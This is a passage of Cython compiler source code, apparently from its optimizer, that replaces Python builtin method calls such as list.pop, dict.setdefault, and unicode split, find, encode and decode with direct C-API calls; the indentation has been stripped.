arg.pos, type=PyrexTypes.c_int_type,
value=str(ord(arg.value)),
constant_result=ord(arg.value)
).coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.StringNode):
if arg.unicode_value and len(arg.unicode_value) == 1 \
and ord(arg.unicode_value) <= 255: # Py2/3 portability
return ExprNodes.IntNode(
arg.pos, type=PyrexTypes.c_int_type,
value=str(ord(arg.unicode_value)),
constant_result=ord(arg.unicode_value)
).coerce_to(node.type, self.current_env())
return node
### special methods
Pyx_tp_new_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("args", Builtin.tuple_type, None),
])
Pyx_tp_new_kwargs_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("args", Builtin.tuple_type, None),
PyrexTypes.CFuncTypeArg("kwargs", Builtin.dict_type, None),
])
def _handle_any_slot__new__(self, node, function, args,
is_unbound_method, kwargs=None):
"""Replace 'exttype.__new__(exttype, ...)' by a call to exttype->tp_new()
"""
obj = function.obj
if not is_unbound_method or len(args) < 1:
return node
type_arg = args[0]
if not obj.is_name or not type_arg.is_name:
# play safe
return node
if obj.type != Builtin.type_type or type_arg.type != Builtin.type_type:
# not a known type, play safe
return node
if not type_arg.type_entry or not obj.type_entry:
if obj.name != type_arg.name:
return node
# otherwise, we know it's a type and we know it's the same
# type for both - that should do
elif type_arg.type_entry != obj.type_entry:
# different types - may or may not lead to an error at runtime
return node
args_tuple = ExprNodes.TupleNode(node.pos, args=args[1:])
args_tuple = args_tuple.analyse_types(
self.current_env(), skip_children=True)
if type_arg.type_entry:
ext_type = type_arg.type_entry.type
if (ext_type.is_extension_type and ext_type.typeobj_cname and
ext_type.scope.global_scope() == self.current_env().global_scope()):
# known type in current module
tp_slot = TypeSlots.ConstructorSlot("tp_new", '__new__')
slot_func_cname = TypeSlots.get_slot_function(ext_type.scope, tp_slot)
if slot_func_cname:
cython_scope = self.context.cython_scope
PyTypeObjectPtr = PyrexTypes.CPtrType(
cython_scope.lookup('PyTypeObject').type)
pyx_tp_new_kwargs_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyTypeObjectPtr, None),
PyrexTypes.CFuncTypeArg("args", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("kwargs", PyrexTypes.py_object_type, None),
])
type_arg = ExprNodes.CastNode(type_arg, PyTypeObjectPtr)
if not kwargs:
kwargs = ExprNodes.NullNode(node.pos, type=PyrexTypes.py_object_type) # hack?
return ExprNodes.PythonCapiCallNode(
node.pos, slot_func_cname,
pyx_tp_new_kwargs_func_type,
args=[type_arg, args_tuple, kwargs],
is_temp=True)
else:
# arbitrary variable, needs a None check for safety
type_arg = type_arg.as_none_safe_node(
"object.__new__(X): X is not a type object (NoneType)")
utility_code = UtilityCode.load_cached('tp_new', 'ObjectHandling.c')
if kwargs:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_tp_new_kwargs", self.Pyx_tp_new_kwargs_func_type,
args=[type_arg, args_tuple, kwargs],
utility_code=utility_code,
is_temp=node.is_temp
)
else:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_tp_new", self.Pyx_tp_new_func_type,
args=[type_arg, args_tuple],
utility_code=utility_code,
is_temp=node.is_temp
)
### methods of builtin types
PyObject_Append_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("item", PyrexTypes.py_object_type, None),
],
exception_value="-1")
def _handle_simple_method_object_append(self, node, function, args, is_unbound_method):
"""Optimistic optimisation as X.append() is almost always
referring to a list.
"""
if len(args) != 2 or node.result_is_used:
return node
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyObject_Append", self.PyObject_Append_func_type,
args=args,
may_return_none=False,
is_temp=node.is_temp,
result_is_used=False,
utility_code=load_c_utility('append')
)
PyByteArray_Append_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("bytearray", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("value", PyrexTypes.c_int_type, None),
],
exception_value="-1")
PyByteArray_AppendObject_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("bytearray", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("value", PyrexTypes.py_object_type, None),
],
exception_value="-1")
def _handle_simple_method_bytearray_append(self, node, function, args, is_unbound_method):
if len(args) != 2:
return node
func_name = "__Pyx_PyByteArray_Append"
func_type = self.PyByteArray_Append_func_type
value = unwrap_coerced_node(args[1])
if value.type.is_int or isinstance(value, ExprNodes.IntNode):
value = value.coerce_to(PyrexTypes.c_int_type, self.current_env())
utility_code = UtilityCode.load_cached("ByteArrayAppend", "StringTools.c")
elif value.is_string_literal:
if not value.can_coerce_to_char_literal():
return node
value = value.coerce_to(PyrexTypes.c_char_type, self.current_env())
utility_code = UtilityCode.load_cached("ByteArrayAppend", "StringTools.c")
elif value.type.is_pyobject:
func_name = "__Pyx_PyByteArray_AppendObject"
func_type = self.PyByteArray_AppendObject_func_type
utility_code = UtilityCode.load_cached("ByteArrayAppendObject", "StringTools.c")
else:
return node
new_node = ExprNodes.PythonCapiCallNode(
node.pos, func_name, func_type,
args=[args[0], value],
may_return_none=False,
is_temp=node.is_temp,
utility_code=utility_code,
)
if node.result_is_used:
new_node = new_node.coerce_to(node.type, self.current_env())
return new_node
PyObject_Pop_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
])
PyObject_PopIndex_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("is_signed", PyrexTypes.c_int_type, None),
],
has_varargs=True) # to fake the additional macro args that lack a proper C type
def _handle_simple_method_list_pop(self, node, function, args, is_unbound_method):
return self._handle_simple_method_object_pop(
node, function, args, is_unbound_method, is_list=True)
def _handle_simple_method_object_pop(self, node, function, args, is_unbound_method, is_list=False):
"""Optimistic optimisation as X.pop([n]) is almost always
referring to a list.
"""
if not args:
return node
obj = args[0]
if is_list:
type_name = 'List'
obj = obj.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error="PyExc_AttributeError",
format_args=['pop'])
else:
type_name = 'Object'
if len(args) == 1:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py%s_Pop" % type_name,
self.PyObject_Pop_func_type,
args=[obj],
may_return_none=True,
is_temp=node.is_temp,
utility_code=load_c_utility('pop'),
)
elif len(args) == 2:
index = unwrap_coerced_node(args[1])
orig_index_type = index.type
if not index.type.is_int:
if is_list or isinstance(index, ExprNodes.IntNode):
index = index.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
else:
return node
elif not PyrexTypes.numeric_type_fits(index.type, PyrexTypes.c_py_ssize_t_type):
return node
# real type might still be larger at runtime
if not orig_index_type.is_int:
orig_index_type = index.type
if not orig_index_type.create_to_py_utility_code(self.current_env()):
return node
convert_func = orig_index_type.to_py_function
conversion_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [PyrexTypes.CFuncTypeArg("intval", orig_index_type, None)])
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py%s_PopIndex" % type_name,
self.PyObject_PopIndex_func_type,
args=[obj, index,
ExprNodes.IntNode(index.pos, value=str(orig_index_type.signed and 1 or 0),
constant_result=orig_index_type.signed and 1 or 0,
type=PyrexTypes.c_int_type),
ExprNodes.RawCNameExprNode(index.pos, PyrexTypes.c_void_type,
orig_index_type.empty_declaration_code()),
ExprNodes.RawCNameExprNode(index.pos, conversion_type, convert_func)],
may_return_none=True,
is_temp=node.is_temp,
utility_code=load_c_utility("pop_index"),
)
return node
single_param_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None),
],
exception_value = "-1")
def _handle_simple_method_list_sort(self, node, function, args, is_unbound_method):
"""Call PyList_Sort() instead of the 0-argument l.sort().
"""
if len(args) != 1:
return node
return self._substitute_method_call(
node, function, "PyList_Sort", self.single_param_func_type,
'sort', is_unbound_method, args).coerce_to(node.type, self.current_env)
Pyx_PyDict_GetItem_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("key", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("default", PyrexTypes.py_object_type, None),
])
def _handle_simple_method_dict_get(self, node, function, args, is_unbound_method):
"""Replace dict.get() by a call to PyDict_GetItem().
"""
if len(args) == 2:
args.append(ExprNodes.NoneNode(node.pos))
elif len(args) != 3:
self._error_wrong_arg_count('dict.get', node, args, "2 or 3")
return node
return self._substitute_method_call(
node, function,
"__Pyx_PyDict_GetItemDefault", self.Pyx_PyDict_GetItem_func_type,
'get', is_unbound_method, args,
may_return_none = True,
utility_code = load_c_utility("dict_getitem_default"))
Pyx_PyDict_SetDefault_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("key", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("default", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("is_safe_type", PyrexTypes.c_int_type, None),
])
def _handle_simple_method_dict_setdefault(self, node, function, args, is_unbound_method):
"""Replace dict.setdefault() by calls to PyDict_GetItem() and PyDict_SetItem().
"""
if len(args) == 2:
args.append(ExprNodes.NoneNode(node.pos))
elif len(args) != 3:
self._error_wrong_arg_count('dict.setdefault', node, args, "2 or 3")
return node
key_type = args[1].type
if key_type.is_builtin_type:
is_safe_type = int(key_type.name in
'str bytes unicode float int long bool')
elif key_type is PyrexTypes.py_object_type:
is_safe_type = -1 # don't know
else:
is_safe_type = 0 # definitely not
args.append(ExprNodes.IntNode(
node.pos, value=str(is_safe_type), constant_result=is_safe_type))
return self._substitute_method_call(
node, function,
"__Pyx_PyDict_SetDefault", self.Pyx_PyDict_SetDefault_func_type,
'setdefault', is_unbound_method, args,
may_return_none=True,
utility_code=load_c_utility('dict_setdefault'))
### unicode type methods
PyUnicode_uchar_predicate_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("uchar", PyrexTypes.c_py_ucs4_type, None),
])
def _inject_unicode_predicate(self, node, function, args, is_unbound_method):
if is_unbound_method or len(args) != 1:
return node
ustring = args[0]
if not isinstance(ustring, ExprNodes.CoerceToPyTypeNode) or \
not ustring.arg.type.is_unicode_char:
return node
uchar = ustring.arg
method_name = function.attribute
if method_name == 'istitle':
# istitle() doesn't directly map to Py_UNICODE_ISTITLE()
utility_code = UtilityCode.load_cached(
"py_unicode_istitle", "StringTools.c")
function_name = '__Pyx_Py_UNICODE_ISTITLE'
else:
utility_code = None
function_name = 'Py_UNICODE_%s' % method_name.upper()
func_call = self._substitute_method_call(
node, function,
function_name, self.PyUnicode_uchar_predicate_func_type,
method_name, is_unbound_method, [uchar],
utility_code = utility_code)
if node.type.is_pyobject:
func_call = func_call.coerce_to_pyobject(self.current_env)
return func_call
_handle_simple_method_unicode_isalnum = _inject_unicode_predicate
_handle_simple_method_unicode_isalpha = _inject_unicode_predicate
_handle_simple_method_unicode_isdecimal = _inject_unicode_predicate
_handle_simple_method_unicode_isdigit = _inject_unicode_predicate
_handle_simple_method_unicode_islower = _inject_unicode_predicate
_handle_simple_method_unicode_isnumeric = _inject_unicode_predicate
_handle_simple_method_unicode_isspace = _inject_unicode_predicate
_handle_simple_method_unicode_istitle = _inject_unicode_predicate
_handle_simple_method_unicode_isupper = _inject_unicode_predicate
PyUnicode_uchar_conversion_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ucs4_type, [
PyrexTypes.CFuncTypeArg("uchar", PyrexTypes.c_py_ucs4_type, None),
])
def _inject_unicode_character_conversion(self, node, function, args, is_unbound_method):
if is_unbound_method or len(args) != 1:
return node
ustring = args[0]
if not isinstance(ustring, ExprNodes.CoerceToPyTypeNode) or \
not ustring.arg.type.is_unicode_char:
return node
uchar = ustring.arg
method_name = function.attribute
function_name = 'Py_UNICODE_TO%s' % method_name.upper()
func_call = self._substitute_method_call(
node, function,
function_name, self.PyUnicode_uchar_conversion_func_type,
method_name, is_unbound_method, [uchar])
if node.type.is_pyobject:
func_call = func_call.coerce_to_pyobject(self.current_env)
return func_call
_handle_simple_method_unicode_lower = _inject_unicode_character_conversion
_handle_simple_method_unicode_upper = _inject_unicode_character_conversion
_handle_simple_method_unicode_title = _inject_unicode_character_conversion
PyUnicode_Splitlines_func_type = PyrexTypes.CFuncType(
Builtin.list_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("keepends", PyrexTypes.c_bint_type, None),
])
def _handle_simple_method_unicode_splitlines(self, node, function, args, is_unbound_method):
"""Replace unicode.splitlines(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (1,2):
self._error_wrong_arg_count('unicode.splitlines', node, args, "1 or 2")
return node
self._inject_bint_default_argument(node, args, 1, False)
return self._substitute_method_call(
node, function,
"PyUnicode_Splitlines", self.PyUnicode_Splitlines_func_type,
'splitlines', is_unbound_method, args)
PyUnicode_Split_func_type = PyrexTypes.CFuncType(
Builtin.list_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("sep", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("maxsplit", PyrexTypes.c_py_ssize_t_type, None),
]
)
def _handle_simple_method_unicode_split(self, node, function, args, is_unbound_method):
"""Replace unicode.split(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (1,2,3):
self._error_wrong_arg_count('unicode.split', node, args, "1-3")
return node
if len(args) < 2:
args.append(ExprNodes.NullNode(node.pos))
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "-1")
return self._substitute_method_call(
node, function,
"PyUnicode_Split", self.PyUnicode_Split_func_type,
'split', is_unbound_method, args)
PyString_Tailmatch_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("str", PyrexTypes.py_object_type, None), # bytes/str/unicode
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("direction", PyrexTypes.c_int_type, None),
],
exception_value = '-1')
def _handle_simple_method_unicode_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'unicode', 'endswith',
unicode_tailmatch_utility_code, +1)
def _handle_simple_method_unicode_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'unicode', 'startswith',
unicode_tailmatch_utility_code, -1)
def _inject_tailmatch(self, node, function, args, is_unbound_method, type_name,
method_name, utility_code, direction):
"""Replace unicode.startswith(...) and unicode.endswith(...)
by a direct call to the corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('%s.%s' % (type_name, method_name), node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
args.append(ExprNodes.IntNode(
node.pos, value=str(direction), type=PyrexTypes.c_int_type))
method_call = self._substitute_method_call(
node, function,
"__Pyx_Py%s_Tailmatch" % type_name.capitalize(),
self.PyString_Tailmatch_func_type,
method_name, is_unbound_method, args,
utility_code = utility_code)
return method_call.coerce_to(Builtin.bool_type, self.current_env())
PyUnicode_Find_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("direction", PyrexTypes.c_int_type, None),
],
exception_value = '-2')
def _handle_simple_method_unicode_find(self, node, function, args, is_unbound_method):
return self._inject_unicode_find(
node, function, args, is_unbound_method, 'find', +1)
def _handle_simple_method_unicode_rfind(self, node, function, args, is_unbound_method):
return self._inject_unicode_find(
node, function, args, is_unbound_method, 'rfind', -1)
def _inject_unicode_find(self, node, function, args, is_unbound_method,
method_name, direction):
"""Replace unicode.find(...) and unicode.rfind(...) by a
direct call to the corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('unicode.%s' % method_name, node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
args.append(ExprNodes.IntNode(
node.pos, value=str(direction), type=PyrexTypes.c_int_type))
method_call = self._substitute_method_call(
node, function, "PyUnicode_Find", self.PyUnicode_Find_func_type,
method_name, is_unbound_method, args)
return method_call.coerce_to_pyobject(self.current_env())
PyUnicode_Count_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
],
exception_value = '-1')
def _handle_simple_method_unicode_count(self, node, function, args, is_unbound_method):
"""Replace unicode.count(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('unicode.count', node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
method_call = self._substitute_method_call(
node, function, "PyUnicode_Count", self.PyUnicode_Count_func_type,
'count', is_unbound_method, args)
return method_call.coerce_to_pyobject(self.current_env())
PyUnicode_Replace_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("replstr", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("maxcount", PyrexTypes.c_py_ssize_t_type, None),
])
def _handle_simple_method_unicode_replace(self, node, function, args, is_unbound_method):
"""Replace unicode.replace(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (3,4):
self._error_wrong_arg_count('unicode.replace', node, args, "3-4")
return node
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "-1")
return self._substitute_method_call(
node, function, "PyUnicode_Replace", self.PyUnicode_Replace_func_type,
'replace', is_unbound_method, args)
PyUnicode_AsEncodedString_func_type = PyrexTypes.CFuncType(
Builtin.bytes_type, [
PyrexTypes.CFuncTypeArg("obj", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
])
PyUnicode_AsXyzString_func_type = PyrexTypes.CFuncType(
Builtin.bytes_type, [
PyrexTypes.CFuncTypeArg("obj", Builtin.unicode_type, None),
])
_special_encodings = ['UTF8', 'UTF16', 'Latin1', 'ASCII',
'unicode_escape', 'raw_unicode_escape']
_special_codecs = [ (name, codecs.getencoder(name))
for name in _special_encodings ]
def _handle_simple_method_unicode_encode(self, node, function, args, is_unbound_method):
"""Replace unicode.encode(...) by a direct C-API call to the
corresponding codec.
"""
if len(args) < 1 or len(args) > 3:
self._error_wrong_arg_count('unicode.encode', node, args, '1-3')
return node
string_node = args[0]
if len(args) == 1:
null_node = ExprNodes.NullNode(node.pos)
return self._substitute_method_call(
node, function, "PyUnicode_AsEncodedString",
self.PyUnicode_AsEncodedString_func_type,
'encode', is_unbound_method, [string_node, null_node, null_node])
parameters = self._unpack_encoding_and_error_mode(node.pos, args)
if parameters is None:
return node
encoding, encoding_node, error_handling, error_handling_node = parameters
if encoding and isinstance(string_node, ExprNodes.UnicodeNode):
# constant, so try to do the encoding at compile time
try:
value = string_node.value.encode(encoding, error_handling)
except:
# well, looks like we can't
pass
else:
value = BytesLiteral(value)
value.encoding = encoding
return ExprNodes.BytesNode(
string_node.pos, value=value, type=Builtin.bytes_type)
if encoding and error_handling == 'strict':
# try to find a specific encoder function
codec_name = self._find_special_codec_name(encoding)
if codec_name is not None:
encode_function = "PyUnicode_As%sString" % codec_name
return self._substitute_method_call(
node, function, encode_function,
self.PyUnicode_AsXyzString_func_type,
'encode', is_unbound_method, [string_node])
return self._substitute_method_call(
node, function, "PyUnicode_AsEncodedString",
self.PyUnicode_AsEncodedString_func_type,
'encode', is_unbound_method,
[string_node, encoding_node, error_handling_node])
PyUnicode_DecodeXyz_func_ptr_type = PyrexTypes.CPtrType(PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("size", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
]))
_decode_c_string_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", PyUnicode_DecodeXyz_func_ptr_type, None),
])
_decode_bytes_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", PyUnicode_DecodeXyz_func_ptr_type, None),
])
_decode_cpp_string_func_type = None # lazy init
def _handle_simple_method_bytes_decode(self, node, function, args, is_unbound_method):
"""Replace char*.decode() by a direct C-API call to the
corresponding codec, possibly resolving a slice on the char*.
"""
if not (1 <= len(args) <= 3):
self._error_wrong_arg_count('bytes.decode', node, args, '1-3')
return node
# normalise input nodes
string_node = args[0]
start = stop = None
if isinstance(string_node, ExprNodes.SliceIndexNode):
index_node = string_node
string_node = index_node.base
start, stop = index_node.start, index_node.stop
if not start or start.constant_result == 0:
start = None
if isinstance(string_node, ExprNodes.CoerceToPyTypeNode):
string_node = string_node.arg
string_type = string_node.type
if string_type in (Builtin.bytes_type, Builtin.bytearray_type):
if is_unbound_method:
string_node = string_node.as_none_safe_node(
"descriptor '%s' requires a '%s' object but received a 'NoneType'",
format_args=['decode', string_type.name])
else:
string_node = string_node.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error="PyExc_AttributeError",
format_args=['decode'])
elif not string_type.is_string and not string_type.is_cpp_string:
# nothing to optimise here
return node
parameters = self._unpack_encoding_and_error_mode(node.pos, args)
if parameters is None:
return node
encoding, encoding_node, error_handling, error_handling_node = parameters
if not start:
start = ExprNodes.IntNode(node.pos, value='0', constant_result=0)
elif not start.type.is_int:
start = start.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop and not stop.type.is_int:
stop = stop.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
# try to find a specific encoder function
codec_name = None
if encoding is not None:
codec_name = self._find_special_codec_name(encoding)
if codec_name is not None:
decode_function = ExprNodes.RawCNameExprNode(
node.pos, type=self.PyUnicode_DecodeXyz_func_ptr_type,
cname="PyUnicode_Decode%s" % codec_name)
encoding_node = ExprNodes.NullNode(node.pos)
else:
decode_function = ExprNodes.NullNode(node.pos)
# build the helper function call
temps = []
if string_type.is_string:
# C string
if not stop:
# use strlen() to find the string length, just as CPython would
if not string_node.is_name:
string_node = UtilNodes.LetRefNode(string_node) # used twice
temps.append(string_node)
stop = ExprNodes.PythonCapiCallNode(
string_node.pos, "strlen", self.Pyx_strlen_func_type,
args=[string_node],
is_temp=False,
utility_code=UtilityCode.load_cached("IncludeStringH", "StringTools.c"),
).coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
helper_func_type = self._decode_c_string_func_type
utility_code_name = 'decode_c_string'
elif string_type.is_cpp_string:
# C++ std::string
if not stop:
stop = ExprNodes.IntNode(node.pos, value='PY_SSIZE_T_MAX',
constant_result=ExprNodes.not_a_constant)
if self._decode_cpp_string_func_type is None:
# lazy init to reuse the C++ string type
self._decode_cpp_string_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", string_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", self.PyUnicode_DecodeXyz_func_ptr_type, None),
])
helper_func_type = self._decode_cpp_string_func_type
utility_code_name = 'decode_cpp_string'
else:
# Python bytes/bytearray object
if not stop:
stop = ExprNodes.IntNode(node.pos, value='PY_SSIZE_T_MAX',
constant_result=ExprNodes.not_a_constant)
helper_func_type = self._decode_bytes_func_type
if string_type is Builtin.bytes_type:
utility_code_name = 'decode_bytes'
else:
utility_code_name = 'decode_bytearray'
node = ExprNodes.PythonCapiCallNode(
node.pos, '__Pyx_%s' % utility_code_name, helper_func_type,
args=[string_node, start, stop, encoding_node, error_handling_node, decode_function],
is_temp=node.is_temp,
utility_code=UtilityCode.load_cached(utility_code_name, 'StringTools.c'),
)
for temp in temps[::-1]:
node = UtilNodes.EvalWithTempExprNode(temp, node)
return node
_handle_simple_method_bytearray_decode = _handle_simple_method_bytes_decode
def _find_special_codec_name(self, encoding):
try:
requested_codec = codecs.getencoder(encoding)
except LookupError:
return None
for name, codec in self._special_codecs:
if codec == requested_codec:
if '_' in name:
name = ''.join([s.capitalize()
for s in name.split('_')])
return name
return None
def _unpack_encoding_and_error_mode(self, pos, args):
null_node = ExprNodes.NullNode(pos)
if len(args) >= 2:
encoding, encoding_node = self._unpack_string_and_cstring_node(args[1])
if encoding_node is None:
return None
else:
encoding = None
encoding_node = null_node
if len(args) == 3:
error_handling, error_handling_node = self._unpack_string_and_cstring_node(args[2])
if error_handling_node is None:
return None
if error_handling == 'strict':
error_handling_node = null_node
else:
error_handling = 'strict'
error_handling_node = null_node
return (encoding, encoding_node, error_handling, error_handling_node)
def _unpack_string_and_cstring_node(self, node):
if isinstance(node, ExprNodes.CoerceToPyTypeNode):
node = node.arg
if isinstance(node, ExprNodes.UnicodeNode):
encoding = node.value
node = ExprNodes.BytesNode(
node.pos, value=BytesLiteral(encoding.utf8encode()),
type=PyrexTypes.c_char_ptr_type)
elif isinstance(node, (ExprNodes.StringNode, ExprNodes.BytesNode)):
encoding = node.value.decode('ISO-8859-1')
node = ExprNodes.BytesNode(
node.pos, value=node.value, type=PyrexTypes.c_char_ptr_type)
elif node.type is Builtin.bytes_type:
encoding = None
node = node.coerce_to(PyrexTypes.c_char_ptr_type, self.current_env())
elif node.type.is_string:
encoding = None
else:
encoding = node = None
return encoding, node
def _handle_simple_method_str_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'str', 'endswith',
str_tailmatch_utility_code, +1)
def _handle_simple_method_str_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'str', 'startswith',
str_tailmatch_utility_code, -1)
def _handle_simple_method_bytes_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytes', 'endswith',
bytes_tailmatch_utility_code, +1)
def _handle_simple_method_bytes_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytes', 'startswith',
bytes_tailmatch_utility_code, -1)
''' # disabled for now, enable when we consider it worth it (see StringTools.c)
def _handle_simple_method_bytearray_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
